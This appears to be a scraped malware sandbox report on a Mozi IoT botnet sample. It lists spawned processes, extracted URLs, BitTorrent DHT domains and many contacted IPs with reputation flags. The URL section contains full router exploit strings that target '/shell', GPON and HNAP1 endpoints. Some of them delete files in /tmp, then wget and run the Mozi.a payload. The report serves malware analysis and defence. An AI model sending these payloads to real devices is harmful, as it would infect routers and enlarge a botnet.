/bin/sh
/bin/sh -e /proc/self/fd/9
clean
/bin/sh
n/a
clean
/bin/date
date
clean
/bin/sh
n/a
clean
/usr/share/apport/apport-checkreports
/usr/bin/python3 /usr/share/apport/apport-checkreports --system
clean
/sbin/upstart
n/a
clean
/bin/sh
/bin/sh -e /proc/self/fd/9
clean
/bin/sh
n/a
clean
/bin/date
date
clean
/bin/sh
n/a
clean
/usr/share/apport/apport-gtk
/usr/bin/python3 /usr/share/apport/apport-gtk
clean
/sbin/upstart
n/a
clean
/bin/sh
/bin/sh -e /proc/self/fd/9
clean
/bin/sh
n/a
clean
/bin/date
date
clean
/bin/sh
n/a
clean
/usr/share/apport/apport-gtk
/usr/bin/python3 /usr/share/apport/apport-gtk
clean
There are 155 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://%s:%d/bin.sh;chmod
unknown
malicious
http://127.0.0.1:80/GponForm/diag_Form?images/
193.176.117.172
malicious
http://95.217.3.9:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
95.217.3.9
malicious
http://104.72.178.146:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
104.72.178.146
malicious
http://3.11.29.16:80/HNAP1/
3.11.29.16
malicious
http://220.130.214.100:80/HNAP1/
220.130.214.100
malicious
http://%s:%d/bin.sh
unknown
malicious
http://121.5.104.125:80/HNAP1/
121.5.104.125
malicious
http://69.195.90.130:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
69.195.90.130
malicious
http://pastebin.ca)
unknown
clean
http://%s:%d/Mozi.a;chmod
unknown
clean
http://schemas.xmlsoap.org/soap/encoding/
unknown
clean
http://127.0.0.1:8080/GponForm/diag_Form?images/
121.162.91.85
clean
http://%s:%d/Mozi.m;$
unknown
clean
http://schemas.xmlsoap.org/soap/envelope/
unknown
clean
http://127.0.0.1
unknown
clean
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
unknown
clean
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
unknown
clean
http://www.alsa-project.org
unknown
clean
http://www.pastebin.ca/upload.php
unknown
clean
http://%s:%d/Mozi.m
unknown
clean
http://www.alsa-project.org/cardinfo-db/
unknown
clean
http://127.0.0.1sendcmd
unknown
clean
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
unknown
clean
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
unknown
clean
http://ipinfo.io/ip
unknown
clean
http://164.125.103.242:80/HNAP1/
164.125.103.242
clean
http://%s:%d/Mozi.m;/tmp/Mozi.m
unknown
clean
http://www.pastebin.ca
unknown
clean
http://purenetworks.com/HNAP1/
unknown
clean
http://www.alsa-project.org/alsa-info.sh
unknown
clean
http://%s:%d/Mozi.m;
unknown
clean
http://www.alsa-project.org.
unknown
clean
http://HTTP/1.1
unknown
clean
http://%s:%d/Mozi.a;sh$
unknown
clean
http://www.pastebin.ca.
unknown
clean
http://34.90.159.216:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
34.90.159.216
clean
http://schemas.xmlsoap.org/soap/envelope//
unknown
clean
There are 28 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
dht.transmissionbt.com
212.129.33.59
clean
bttracker.acc.umu.se
130.239.18.159
clean
router.bittorrent.com
67.215.246.10
clean
router.utorrent.com
82.221.103.244
clean
bttracker.debian.org
unknown
clean

IPs

IP
Domain
Country
Malicious
138.94.203.237
unknown
Brazil
malicious
195.157.0.194
unknown
United Kingdom
clean
96.85.17.58
unknown
United States
clean
27.197.73.200
unknown
China
clean
40.244.52.155
unknown
United States
clean
118.208.32.220
unknown
Australia
clean
220.236.199.32
unknown
Australia
clean
64.134.176.11
unknown
United States
clean
5.71.245.186
unknown
United Kingdom
clean
13.162.43.135
unknown
United States
clean
97.71.87.134
unknown
United States
clean
72.163.148.240
unknown
United States
clean
39.187.20.227
unknown
China
clean
175.111.30.198
unknown
Korea Republic of
clean
96.100.50.191
unknown
United States
clean
119.215.90.101
unknown
Korea Republic of
clean
86.170.164.103
unknown
United Kingdom
clean
172.143.86.137
unknown
United States
clean
39.241.4.19
unknown
Indonesia
clean
196.164.176.188
unknown
South Africa
clean
46.14.87.211
unknown
Switzerland
clean
14.239.14.115
unknown
Viet Nam
clean
35.37.134.166
unknown
United States
clean
102.44.180.253
unknown
Egypt
clean
166.201.228.49
unknown
United States
clean
136.26.47.177
unknown
United States
clean
178.82.160.65
unknown
Switzerland
clean
37.211.3.99
unknown
Qatar
clean
11.89.47.10
unknown
United States
clean
124.12.205.156
unknown
Taiwan; Republic of China (ROC)
clean
5.232.235.2
unknown
Iran (ISLAMIC Republic Of)
clean
217.131.3.242
unknown
Turkey
clean
182.9.38.118
unknown
Indonesia
clean
187.213.209.8
unknown
Mexico
clean
181.113.148.196
unknown
Ecuador
clean
79.116.36.122
unknown
Romania
clean
157.159.2.178
unknown
France
clean
133.82.183.72
unknown
Japan
clean
77.187.60.235
unknown
Germany
clean
221.68.20.5
unknown
Japan
clean
53.117.221.59
unknown
Germany
clean
2.164.195.43
unknown
Germany
clean
68.129.151.18
unknown
United States
clean
108.204.197.113
unknown
United States
clean
95.82.71.140
unknown
Kazakhstan
clean
128.101.242.184
unknown
United States
clean
185.149.161.32
unknown
Russian Federation
clean
118.191.184.146
unknown
China
clean
221.97.226.130
unknown
Japan
clean
197.67.5.164
unknown
South Africa
clean
203.49.228.158
unknown
Australia
clean
185.189.120.185
unknown
Iran (ISLAMIC Republic Of)
clean
117.177.0.80
unknown
China
clean
194.207.227.221
unknown
United Kingdom
clean
104.222.233.43
unknown
United States
clean
208.150.231.33
unknown
United States
clean
162.159.107.38
unknown
United States
clean
120.123.201.216
unknown
Taiwan; Republic of China (ROC)
clean
87.178.42.105
unknown
Germany
clean
166.231.171.29
unknown
United States
clean
113.81.33.205
unknown
China
clean
18.198.126.226
unknown
United States
clean
32.26.172.252
unknown
United States
clean
84.234.82.133
unknown
Denmark
clean
64.48.220.97
unknown
United States
clean
86.18.93.173
unknown
United Kingdom
clean
163.112.176.81
unknown
France
clean
200.161.213.126
unknown
Brazil
clean
32.69.172.174
unknown
United States
clean
161.141.143.253
unknown
Canada
clean
68.87.138.12
unknown
United States
clean
91.244.32.53
unknown
Ukraine
clean
175.12.222.235
unknown
China
clean
17.103.205.243
unknown
United States
clean
199.247.32.171
unknown
United States
clean
120.72.175.96
unknown
China
clean
19.21.98.61
unknown
United States
clean
134.106.59.104
unknown
Germany
clean
107.112.161.192
unknown
United States
clean
167.13.97.181
unknown
United States
clean
4.214.87.116
unknown
United States
clean
53.181.254.20
unknown
Germany
clean
115.24.120.43
unknown
China
clean
79.73.229.27
unknown
United Kingdom
clean
35.121.101.202
unknown
United States
clean
94.117.20.210
unknown
United Kingdom
clean
119.100.162.203
unknown
China
clean
202.146.185.28
unknown
unknown
clean
222.121.68.4
unknown
Korea Republic of
clean
35.224.66.235
unknown
United States
clean
121.192.9.176
unknown
China
clean
201.195.173.239
unknown
Costa Rica
clean
155.228.130.68
unknown
Switzerland
clean
128.188.21.157
unknown
United States
clean
60.234.236.97
unknown
New Zealand
clean
145.152.174.114
unknown
Netherlands
clean
180.77.237.198
unknown
China
clean
159.196.101.170
unknown
Australia
clean
197.35.48.236
unknown
Egypt
clean
175.158.80.139
unknown
India
clean
There are 90 hidden IPs, click here to show them.